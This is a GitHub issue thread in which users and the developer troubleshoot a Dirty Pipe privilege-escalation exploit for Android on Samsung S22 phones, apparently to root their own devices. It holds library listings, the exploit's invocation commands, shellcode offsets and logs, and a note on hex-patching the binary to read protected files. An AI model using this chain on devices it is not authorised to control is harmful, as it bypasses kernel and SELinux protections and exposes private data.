vendor/lib/libqdcm-json-mode-parser.so
vendor/lib/libqdcm-mode-parser.so
vendor/lib/libqdi.so
vendor/lib/libqdma_file_agent.so
00001000: 5f62 6173 6963 5f73 7472 696e 675f 636f  _basic_string_co
vendor/lib/libqdp.so
vendor/lib/libqdpr.so
vendor/lib/libqdutils.so
vendor/lib/libqfp_sensortest.so
vendor/lib/libqisl.so
vendor/lib/libqll.so
vendor/lib/libqll10.so
vendor/lib/libqllengine.so
vendor/lib/libqmi.so
vendor/lib/libqmi_cci.so
vendor/lib/libqmi_client_helper.so
vendor/lib/libqmi_client_qmux.so
vendor/lib/libqmi_common_so.so
vendor/lib/libqmi_csi.so
vendor/lib/libqmi_csvt_srvc.so
vendor/lib/libqmi_encdec.so
vendor/lib/libqmi_legacy.so
vendor/lib/libqmiservices.so
vendor/lib/libqmiservices_ext.so
vendor/lib/libqrtr.so
vendor/lib/libqrtrclient.so
vendor/lib/libqseed3.so
vendor/lib/libqservice.so
vendor/lib/libqshcamera.so
vendor/lib/libqsocket.so
vendor/lib/libqti-iopd-client.so
vendor/lib/libqti-iopd.so
vendor/lib/libqti-perfd-client.so
vendor/lib/libqti-perfd.so
vendor/lib/libqti-util.so
vendor/lib/libqti-utils.so
vendor/lib/libqti_vndfwk_detect.so
vendor/lib/libqti_vndfwk_detect_vendor.so
vendor/lib/libqtigefar.so
vendor/lib/librapidscorer.so
vendor/lib/librcmask.so
vendor/lib/librechdr10plus.sec.so
vendor/lib/librechdr10plus.so
vendor/lib/librecordalive.so
vendor/lib/librmengine.uniplugin@1.0.so
vendor/lib/librmnetctl.so
vendor/lib/librpmb.so
vendor/lib/libsaped.so
vendor/lib/libsavsac.so
vendor/lib/libsavscmn.so
vendor/lib/libsavsvc.so
vendor/lib/libscaler_hw.unifunc.so
vendor/lib/libscaler_sw.unifunc.so
vendor/lib/libscenedetector.uniplugin@1.0.so
vendor/lib/libscveCommon.so
00001000: 5f74 696d 6564 7761 6974 0070 7468 7265  _timedwait.pthre
vendor/lib/libscveCommon_stub.so
vendor/lib/libscveObjectSegmentation.so
vendor/lib/libscveObjectSegmentation_stub.so
vendor/lib/libscveObjectTracker.so
vendor/lib/libscveObjectTracker_stub.so
vendor/lib/libsdedrm.so
vendor/lib/libsdm-color.so
vendor/lib/libsdm-colormgr-algo.so
vendor/lib/libsdm-disp-vndapis.so
vendor/lib/libsdmcore.so
vendor/lib/libsdmextension.so
vendor/lib/libsdmutils.so
vendor/lib/libsdsprpc.so
vendor/lib/libsdynatm.so
vendor/lib/libsec_semRil.so
vendor/lib/libsecaudiocoreutils.so
vendor/lib/libsecaudioinfo.so
vendor/lib/libsecfr_engine.so
vendor/lib/libsecfr_model.so
vendor/lib/libsecnativefeature.so
vendor/lib/libsecril-client.so
vendor/lib/libsecure_storage.so
vendor/lib/libsecureui_svcsock.so
vendor/lib/libsegmentationeffect.uniplugin@1.0.so
vendor/lib/libsegmentationeffect_capture.uniplugin@1.0.so
vendor/lib/libsehbluetooth_audio_session.so
vendor/lib/libsemnativecarrierfeature.so
vendor/lib/libsensorlistener.so
vendor/lib/libsensorndkbridge.so
vendor/lib/libsensorslog.so
vendor/lib/libsevrc.so
vendor/lib/libsfeShiftExtrapolation.so
vendor/lib/libsfplugin_ccodec_utils.so
vendor/lib/libshmemcompat.so
vendor/lib/libshmemutil.so
vendor/lib/libshotsuggestion.so
vendor/lib/libshotsuggestion_engines.so
vendor/lib/libsi.so
vendor/lib/libsmartfocus.uniplugin@1.0.so
vendor/lib/libsmemlog.so
vendor/lib/libsn100u_fw.so
vendor/lib/libsn220u_fw.so
vendor/lib/libsnaace.so
vendor/lib/libsnamrnb.so
vendor/lib/libsnamrwb.so
vendor/lib/libsnapdragoncolor-manager.so
vendor/lib/libsnapdragoncolor-qdcm.so
vendor/lib/libsndcardparser.so
vendor/lib/libsns_device_mode_stub.so
vendor/lib/libsns_direct_channel_stub.so
vendor/lib/libsns_registry_skel.so
vendor/lib/libsnsapi.so
vendor/lib/libsnsdiaglog.so
vendor/lib/libsoc_helper.so
vendor/lib/libsoc_helper_jni.so
vendor/lib/libsocial_image_enhancement.uniplugin@1.0.so
vendor/lib/libspcom.so
vendor/lib/libspeakercalibration.so
vendor/lib/libspictrl.so
vendor/lib/libspl.so
vendor/lib/libsqcp.so
00001000: 5f73 6600 7371 6370 5f74 626c 5f76 715f  _sf.sqcp_tbl_vq_
vendor/lib/libsrib_CNNInterface.camera.samsung.so
vendor/lib/libsrib_humanaware_engine.camera.samsung.so
vendor/lib/libssc.so
vendor/lib/libssc_default_listener.so
vendor/lib/libssd.so
vendor/lib/libssengine.uniplugin@1.0.so
vendor/lib/libstagefright_amrnb_common.so
vendor/lib/libstagefright_bufferpool@2.0.1.so
vendor/lib/libstagefright_bufferqueue_helper_vendor.so
vendor/lib/libstagefright_enc_common.so
vendor/lib/libstagefright_flacdec.so
vendor/lib/libstagefright_foundation_vendor.so
vendor/lib/libstagefright_omx_vendor.so
vendor/lib/libstagefright_soft_aacdec.so
vendor/lib/libstagefright_soft_aacenc.so
vendor/lib/libstagefright_soft_amrdec.so
vendor/lib/libstagefright_soft_amrnbenc.so
vendor/lib/libstagefright_soft_amrwbenc.so
vendor/lib/libstagefright_soft_avcdec.so
vendor/lib/libstagefright_soft_avcenc.so
vendor/lib/libstagefright_soft_flacdec.so
vendor/lib/libstagefright_soft_flacenc.so
vendor/lib/libstagefright_soft_g711dec.so
vendor/lib/libstagefright_soft_gsmdec.so
vendor/lib/libstagefright_soft_hevcdec.so
vendor/lib/libstagefright_soft_mp3dec.so
vendor/lib/libstagefright_soft_mpeg2dec.so
vendor/lib/libstagefright_soft_mpeg4dec.so
vendor/lib/libstagefright_soft_mpeg4enc.so
vendor/lib/libstagefright_soft_opusdec.so
vendor/lib/libstagefright_soft_rawdec.so
vendor/lib/libstagefright_soft_vorbisdec.so
vendor/lib/libstagefright_soft_vpxdec.so
vendor/lib/libstagefright_soft_vpxenc.so
vendor/lib/libstagefright_softomx.so
vendor/lib/libstagefright_softomx_plugin.so
vendor/lib/libstagefrighthw.so
vendor/lib/libstork_shared.so
vendor/lib/libsubsystem_control.so
vendor/lib/libswregistrationalgo.so
vendor/lib/libsynaFpSensorTestNwd.so
vendor/lib/libsynergy_loc_api.so
vendor/lib/libsynx.so
vendor/lib/libsysmon_cdsp_skel.so
vendor/lib/libsystem_health_mon.so
vendor/lib/libtad.so
vendor/lib/libtensorflowLite.singletake.camera.samsung.so
vendor/lib/libtensorflowlite.camera.samsung.so
vendor/lib/libtensorflowlite_gpu.camera.samsung.so
vendor/lib/libtestutils.so
vendor/lib/libtfestriping.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6e75  _ubsan_handle_nu
vendor/lib/libthermalclient.so
vendor/lib/libthirdparty_zoomtranslator_imp.so
vendor/lib/libthreadutils.so
vendor/lib/libtime_genoff.so
vendor/lib/libtinycompress.so
vendor/lib/libtinyxml2_1.so
vendor/lib/libtrustedapploader.so
vendor/lib/libtswrappercommon.so
vendor/lib/libtzdrmgenprov.so
vendor/lib/libubifocus.so
vendor/lib/libucm_tlc_comm.so
vendor/lib/libucm_tlc_direct_comm.so
vendor/lib/libucm_tlc_tz_esecomm.so
vendor/lib/libuniplugin.so
vendor/lib/libvdis.uniplugin@1.0.so
vendor/lib/libvdis_core.so
vendor/lib/libvdis_interface.so
vendor/lib/libvibrator.so
vendor/lib/libvicom.so
vendor/lib/libvideobeauty.arcsoft.so
vendor/lib/libvideobeauty.uniplugin@1.0.so
vendor/lib/libvideobeauty_interface.so
vendor/lib/libvideotxr.so
vendor/lib/libvmmem.so
vendor/lib/libvndfwk_detect_jni.qti.so
vendor/lib/libvndfwk_detect_jni.qti_vendor.so
vendor/lib/libvorbisidec.so
vendor/lib/libvpphcp.so
vendor/lib/libvpphvx.so
vendor/lib/libvppimmotion.so
vendor/lib/libvpx.so
vendor/lib/libwpa_client.so
vendor/lib/libwqe.so
vendor/lib/libwsmd_functions.so
vendor/lib/libxml.so
vendor/lib/libxtadapter.so
vendor/lib/libzoomroi.samsung.so
vendor/lib/qti.video.utils.videobufferlayout.so
vendor/lib/sensors.flicker.so
vendor/lib/sensors.grip.so
vendor/lib/sensors.ssc.so
vendor/lib/shared-file-region-aidl-cpp.so
vendor/lib/unihal_cutils@2.1.so
vendor/lib/unihal_main@2.1.so
vendor/lib/unihal_uniplugin@1.0.so
00001000: 5f6c 696e 6b00 6765 745f 706c 7567 696e  _link.get_plugin
vendor/lib/uwb_uci.helios.so
vendor/lib/vendor.display.color@1.0.so
vendor/lib/vendor.display.color@1.1.so
vendor/lib/vendor.display.color@1.2.so
vendor/lib/vendor.display.color@1.3.so
vendor/lib/vendor.display.color@1.4.so
vendor/lib/vendor.display.color@1.5.so
vendor/lib/vendor.display.color@1.6.so
vendor/lib/vendor.display.color@1.7.so
vendor/lib/vendor.display.config@1.0.so
vendor/lib/vendor.display.config@1.1.so
vendor/lib/vendor.display.config@1.10.so
vendor/lib/vendor.display.config@1.11.so
vendor/lib/vendor.display.config@1.2.so
vendor/lib/vendor.display.config@1.3.so
vendor/lib/vendor.display.config@1.4.so
vendor/lib/vendor.display.config@1.5.so
vendor/lib/vendor.display.config@1.6.so
vendor/lib/vendor.display.config@1.7.so
vendor/lib/vendor.display.config@1.8.so
vendor/lib/vendor.display.config@1.9.so
vendor/lib/vendor.display.config@2.0.so
vendor/lib/vendor.display.postproc@1.0.so
vendor/lib/vendor.qti.data.factory@2.0.so
vendor/lib/vendor.qti.data.factory@2.1.so
vendor/lib/vendor.qti.data.factory@2.2.so
vendor/lib/vendor.qti.data.factory@2.3.so
vendor/lib/vendor.qti.data.factory@2.4.so
vendor/lib/vendor.qti.data.mwqem@1.0.so
vendor/lib/vendor.qti.data.slm@1.0.so
vendor/lib/vendor.qti.diaghal@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.0.so
vendor/lib/vendor.qti.esepowermanager@1.1.so
vendor/lib/vendor.qti.gnss-V1-ndk_platform.so
vendor/lib/vendor.qti.gnss-service.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0-impl.so
vendor/lib/vendor.qti.hardware.AGMIPC@1.0.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0-impl.so
vendor/lib/vendor.qti.hardware.ListenSoundModel@1.0.so
vendor/lib/vendor.qti.hardware.automotive.vehicle@1.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.0.so
vendor/lib/vendor.qti.hardware.bluetooth_audio@2.1.so
vendor/lib/vendor.qti.hardware.cacert@1.0.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.aon@1.0.so
vendor/lib/vendor.qti.hardware.camera.device@1.0.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0-service-impl.so
vendor/lib/vendor.qti.hardware.camera.postproc@1.0.so
vendor/lib/vendor.qti.hardware.capabilityconfigstore@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.api@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.constants@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.0.so
vendor/lib/vendor.qti.hardware.data.cne.internal.server@1.1.so
vendor/lib/vendor.qti.hardware.data.connection@1.0.so
vendor/lib/vendor.qti.hardware.data.connection@1.1.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.0.so
vendor/lib/vendor.qti.hardware.data.dynamicdds@1.1.so
vendor/lib/vendor.qti.hardware.data.flow@1.0.so
vendor/lib/vendor.qti.hardware.data.latency@1.0.so
vendor/lib/vendor.qti.hardware.data.lce@1.0.so
vendor/lib/vendor.qti.hardware.data.qmi@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@1.0.so
vendor/lib/vendor.qti.hardware.display.allocator@3.0.so
vendor/lib/vendor.qti.hardware.display.allocator@4.0.so
vendor/lib/vendor.qti.hardware.display.composer@1.0.so
vendor/lib/vendor.qti.hardware.display.composer@2.0.so
vendor/lib/vendor.qti.hardware.display.config-V1-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V2-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V3-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V4-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.config-V5-ndk_platform.so
vendor/lib/vendor.qti.hardware.display.demura@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.0.so
vendor/lib/vendor.qti.hardware.display.mapper@1.1.so
vendor/lib/vendor.qti.hardware.display.mapper@2.0.so
vendor/lib/vendor.qti.hardware.display.mapper@3.0.so
vendor/lib/vendor.qti.hardware.display.mapper@4.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.0.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.1.so
vendor/lib/vendor.qti.hardware.display.mapperextensions@1.2.so
vendor/lib/vendor.qti.hardware.dsp@1.0.so
vendor/lib/vendor.qti.hardware.eid@1.0.so
vendor/lib/vendor.qti.hardware.fingerprint@1.0.so
vendor/lib/vendor.qti.hardware.iop@1.0.so
vendor/lib/vendor.qti.hardware.iop@2.0.so
vendor/lib/vendor.qti.hardware.mwqemadapter@1.0.so
vendor/lib/vendor.qti.hardware.pal@1.0.so
vendor/lib/vendor.qti.hardware.perf@2.0.so
vendor/lib/vendor.qti.hardware.perf@2.1.so
vendor/lib/vendor.qti.hardware.perf@2.2.so
vendor/lib/vendor.qti.hardware.perf@2.3.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.0.so
vendor/lib/vendor.qti.hardware.qccsyshal@1.1.so
vendor/lib/vendor.qti.hardware.qccvndhal@1.0.so
vendor/lib/vendor.qti.hardware.qdutils_disp@1.0.so
vendor/lib/vendor.qti.hardware.qseecom@1.0.so
vendor/lib/vendor.qti.hardware.qteeconnector@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.0.so
vendor/lib/vendor.qti.hardware.servicetracker@1.1.so
vendor/lib/vendor.qti.hardware.servicetracker@1.2.so
vendor/lib/vendor.qti.hardware.slmadapter@1.0.so
vendor/lib/vendor.qti.hardware.soter@1.0.so
vendor/lib/vendor.qti.hardware.systemhelper@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.0.so
vendor/lib/vendor.qti.hardware.trustedui@1.1.so
vendor/lib/vendor.qti.hardware.trustedui@1.2.so
vendor/lib/vendor.qti.hardware.tui_comm@1.0.so
vendor/lib/vendor.qti.hardware.vpp@1.1.so
vendor/lib/vendor.qti.hardware.vpp@1.2.so
vendor/lib/vendor.qti.hardware.vpp@1.3.so
vendor/lib/vendor.qti.hardware.vpp@2.0.so
vendor/lib/vendor.qti.ims.callcapability@1.0.so
vendor/lib/vendor.qti.ims.callinfo@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.0.so
vendor/lib/vendor.qti.ims.rcsconfig@1.1.so
vendor/lib/vendor.qti.ims.rcsconfig@2.0.so
vendor/lib/vendor.qti.ims.rcsconfig@2.1.so
vendor/lib/vendor.qti.latency@2.0.so
vendor/lib/vendor.qti.latency@2.1.so
vendor/lib/vendor.qti.memory.pasrmanager@1.0.so
vendor/lib/vendor.qti.memory.pasrmanager@1.1.so
vendor/lib/vendor.qti.power.pasrmanager@1.0.so
vendor/lib/vendor.qti.qspmhal@1.0.so
vendor/lib/vendor.qti.spu@1.0.so
vendor/lib/vendor.qti.spu@1.1.so
vendor/lib/vendor.qti.spu@2.0.so
vendor/lib/vendor.qti.voiceprint@1.0.so
vendor/lib/vendor.samsung.hardware.audio@1.0.so
vendor/lib/vendor.samsung.hardware.biometrics.face@2.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dp@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.a2dpsink@1.0.so
vendor/lib/vendor.samsung.hardware.bluetooth.audio@2.0.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0-impl.so
vendor/lib/vendor.samsung.hardware.camera.device@5.0.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0-legacy.so
vendor/lib/vendor.samsung.hardware.camera.provider@4.0.so
vendor/lib/vendor.samsung.hardware.health@2.0.so
vendor/lib/vendor.samsung.hardware.hqm@1.0.so
vendor/lib/vendor.samsung.hardware.hyper-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.security.hdcp.wifidisplay-V2-ndk_platform.so
vendor/lib/vendor.samsung.hardware.snap@1.0.so
vendor/lib/vendor.samsung.hardware.snap@1.1.so
vendor/lib/vendor.samsung.hardware.snap@1.2.so
vendor/lib/vendor.samsung.hardware.thermal@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.blockchain@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1-impl.so
vendor/lib/vendor.samsung.hardware.tlc.hdm@1.1.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.payment@1.0.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0-impl.so
vendor/lib/vendor.samsung.hardware.tlc.ucm@2.0.so
vendor/lib/vendor.samsung.hardware.uwb@1.0.so
vendor/lib/vintf-codecsolution-V2-ndk_platform.so
elliwigy commented 2 years ago

Hey elliwigy how are you doing, ok i will check as you instructrd above i do see that libstagefright_soft_mp3dec.so on s22 doesnt seem to exist there other libstagefright libs there how i have not yet checked offset i will do so later today or tomorrow.

It does exist on s22 ultra (SM-S908U) which is what I posted above in /vendor/lib.. not sure why the S22 would be any different?

polygraphene commented 2 years ago

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

elliwigy commented 2 years ago

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu.

According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

oakieville commented 2 years ago

run.bat dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s) startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s) magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so Offset found: shellcode_offset: a57d0 hook_offset: 5b260 Empty space size: 2096 bytes Run index: 0 Shell code size: 308 0x134 bytes open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

oakieville commented 2 years ago

seems it cant access vendor/lib/* files

Dog10dogg commented 2 years ago

The reason I believe it says the file is not found is because the file "/system/lib/libldacBT_enc.so" does not exist on the smasungs.

My work around was (instead of compiling) Opened the release file "dirtypipe-android" in HxD Changed both places that contained "/system/lib/libldacBT_enc.so" with "/////system/lib/random.so" (the first "/" and the ."so" has to line up but you can have as many beginning "/" as you need to null out extra letters in the path name) Periods before and after the path name are hex "00" and not actually periods.

It'll run but crashes my device almost immediately. It does work tho as I can use it to copy normally unreadable files and copy them to sdcard. I believe it is either knox or the module needs to be trailered to Samsung's kernel. I would attach the log but it crashes without any log output on adb. Also the libs between s908u and s908u1 are different. Only two of the possibilities were the same for me. I used several vendor libs but mostly picked this one /vendor/lib/libcamxifestriping.so due to it beening the same across both models.

I can use the vendor shell to look at the modules on vendor_dklh/lib/modules (I think?). I did see a file called something like "policy config.ko" but it doesn't look like it lines up with the "mymod.ko". That may be irrelevant tho.

oakieville commented 2 years ago

/system/lib/libldacBT_enc.so isnt what it was calling if you look at the code it print "Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so" from same varible it loads lib from, i beleave as elliwigy explained it requires being /vender/bin/sh to access those libs correctly

lib/libextmediaformatdef.so 00001000: 5f63 726f 7000 6369 7479 2d69 6400 7472 _crop.city-id.tr

maybe this?

Dog10dogg commented 2 years ago

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

elliwigy commented 2 years ago

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

S22 Ultra does have it:

/system/lib64/libldacBT_enc.so

Of course its in lib64 not lib dir..

elliwigy commented 2 years ago

The program writes to /system/lib/libldacBT_enc.so and then uses that to write to the vendor files.

The Payload in libc++ mmaps libldacBT_enc.so for stage2 payload which is located in /system/lib/libldacBT_enc.so which the s22 ultra doesn't have.

Edit the file and try it and it'll say it worked but reboots. You can edit startup root and have it copy files to the sdcard that you can't normally access.

so maybe edit it to use the same so file but in lib64

polygraphene commented 2 years ago

You cannot run the command on device. You must extract firmware image on Linux PC like ubuntu. According to your output, we can choose lib for overwrite. The following libraries are the best because it is not so frequently used (I think).

vendor/lib/libcamxifestriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libimage_enhancement.arcsoft.so
00001000: 5f6d 7574 6578 5f64 6573 7472 6f79 0070  _mutex_destroy.p

Download 1.0.2 from release page, then edit run.bat to append arguments like:

%adb% shell %dir%/dirtypipe-android -f /vendor/lib/libcamxifestriping.so

Then launch run.bat and check adb logcat.

I will try this tonight and report back with logcat..

Just out of curiosity, why do you say you cannot run it on the device when the output I provided is from the device? lol

In normal adb shell running as normal shell you cannot view vendor/lib as you get permission denied but if you run as "vendor_shell" you can view the vendor/lib files just fine and can run your commands you posted earlier as I did when sharing the output..

You can try it yourself.. from a regular terminal you simply type:

adb shell /vendor/bin/sh

Then type:

id

and your output should show you are running as vendor_shell where you can then view vendor/lib directory no problem and without having to download firmware, unsparse super.img, lpunpack super.img and mount vendor which is a lot more work and space used lol.. just saying :-)

That's absolutely right. My bad. It was unnecessary to extract firmware. Thanks!

polygraphene commented 2 years ago

run.bat dirtypipe-android: 1 file pushed, 0 skipped. 2.7 MB/s (44688 bytes in 0.016s) startup-root: 1 file pushed, 0 skipped. 0.1 MB/s (3671 bytes in 0.028s) magisk/busybox: 1 file pushed, 0 skipped. 66.9 MB/s (2102536 bytes in 0.030s) magisk/magiskpolicy: 1 file pushed, 0 skipped. 111.1 MB/s (672928 bytes in 0.006s) 4 files pushed, 0 skipped. 0.7 MB/s (2823823 bytes in 3.877s) Ignore device info. Device version: Product=qssi Fingerprint=samsung/r0qsqw/r0q:12/SP1A.210812.016/S901USQU1AVC8:user/release-keys Stage2 libname for kmod overwrite: /vendor/lib/libcamxifestriping.so Offset found: shellcode_offset: a57d0 hook_offset: 5b260 Empty space size: 2096 bytes Run index: 0 Shell code size: 308 0x134 bytes open failed: No such file or directory

logcat is here

http://oakieville.com/logcat.txt

There doesn't seem to be "/system/lib/libldacBT_enc.so" as @Dog10dogg said. Actually "libldacBT_enc.so" can be any file which is not so frequently used by system. You can choose 64bit "/system/lib64/libldacBT_enc.so". I will add option to change this lib.

stage2_lib (/system/lib/libldacBT_enc.so) and stage2_param_libname(/vendor/lib/libstagefright_soft_mp3dec.so in Pixel 6) are confusing name, but have different roles. dirtypipe-android (shell process) overwrite stage2_lib to send code to be executed in init process. Then init process overwrite stage2_param_libname so that it have content of mymod.ko.

polygraphene commented 2 years ago

I would attach the log but it crashes without any log output on adb.

So we should investigate what is causing this crash. I will upload debug version later.

oakieville commented 2 years ago

Also if change that to a lib in system lib in the command it doesnt say file not found or atleast didnt when i tried it

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug1.zip

Try this version. This version should output logcat like following if stage1 has run successfully:

$ adb shell
oriole:/ $ logcat | grep libc
03-29 21:47:19.811 24886   375 F libc    : Fatal signal 7 (SIGBUS), code 1 (BUS_ADRALN), fault addr 0x7fad3d4001 in tid 24886 (init), pid 24886 (init)

In addition to logcat, paste output of run.bat here.

If it still reboot, there is something wrong in stage1.

Even if device doesn't reboot, please manually reboot after launch run.bat. Because it won't automatically restore file content. Reboot is required to restore original files.

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory
polygraphene commented 2 years ago

dirtypipe-android-1.0.3-debug3.zip Try third version if you got "Permission denied".

It will produce following logcat if modprobe was successfully launched:

$ adb shell
oriole:/ $ logcat | grep modprobe
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:76): avc: denied { read } for path="/dev/.dirtypipe-0005" dev="tmpfs" ino=1166 scontext=u:r:vendor_modprobe:s0 tcontext=u:object_r:device:s0 tclass=file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:77): avc: denied { read } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.312  3278  3278 W modprobe: type=1400 audit(0.0:78): avc: denied { write } for path="pipe:[63464]" dev="pipefs" ino=63464 scontext=u:r:vendor_modprobe:s0 tcontext=u:r:init:s0 tclass=fifo_file permissive=0
03-29 22:25:08.331  3278  3278 I modprobe-payload: Parsed lib_mod: /vendor/lib/libstagefright_soft_mp3dec.so
03-29 22:25:08.331  3278  3278 I modprobe-payload: Content: 5f 24 03 d5 a8 88 84 d2

If failed, it might reboot or doesn't output any log.

polygraphene commented 2 years ago

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

elliwigy commented 2 years ago

dirtypipe-android-1.0.3-debug2.zip

Try second version if you got "libc : Fatal signal ..." in logcat. It will generate empty file on /dev/.s2a if stage2 was successfully called.

Run adb shell ls /dev/.s2a to check if file exists When file exists, it says "Permission denied":

$ adb shell ls /dev/.s2a
ls: /dev/.s2a: Permission denied

When not exists (failed to call stage2), it says "No such file or directory" (or reboot):

 $ adb shell ls /dev/.s2a
ls: /dev/.s2a: No such file or directory

Output of run.bat

dirtypipe-android: 1 file pushed, 0 skipped. 0.2 MB/s (45168 bytes in 0.186s)
startup-root: 1 file pushed, 0 skipped. 0.6 MB/s (3671 bytes in 0.006s)
magisk/busybox: 1 file pushed, 0 skipped. 85.1 MB/s (2102536 bytes in 0.024s)
magisk/magiskpolicy: 1 file pushed, 0 skipped. 58.6 MB/s (672928 bytes in 0.011s)
4 files pushed, 0 skipped. 8.5 MB/s (2824303 bytes in 0.318s)
Ignore device info.
Device version: Product=qssi Fingerprint=samsung/b0qsqw/b0q:12/SP1A.210812.016/S908USQU1AVA6:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib64/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libcamxifestriping.so
Offset found: shellcode_offset: a57d0 hook_offset: 5b260 first instruction: d503233f
Empty space size: 2096 bytes
Run index: 8
Stage1 debug filename: /dev/.dirtypipe-0008
Shell code size: 344 0x158 bytes
It worked!
Press any key to continue . . .

Logcat

It crashes before can check the /dev exists.. It does a kernel panic.

elliwigy commented 2 years ago

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

Yep, kernel panic/crash on my S22 Ultra

elliwigy commented 2 years ago

dirtypipe-android-1.0.3-beta.zip

Try this version if you succeeded to run debug1-3. If this version still reboot the device, there is something wrong on kernel module.

I am downloading SM-S908U kernel source code now

polygraphene commented 2 years ago

You missed debug1. But I found the problem in your log on debug2.

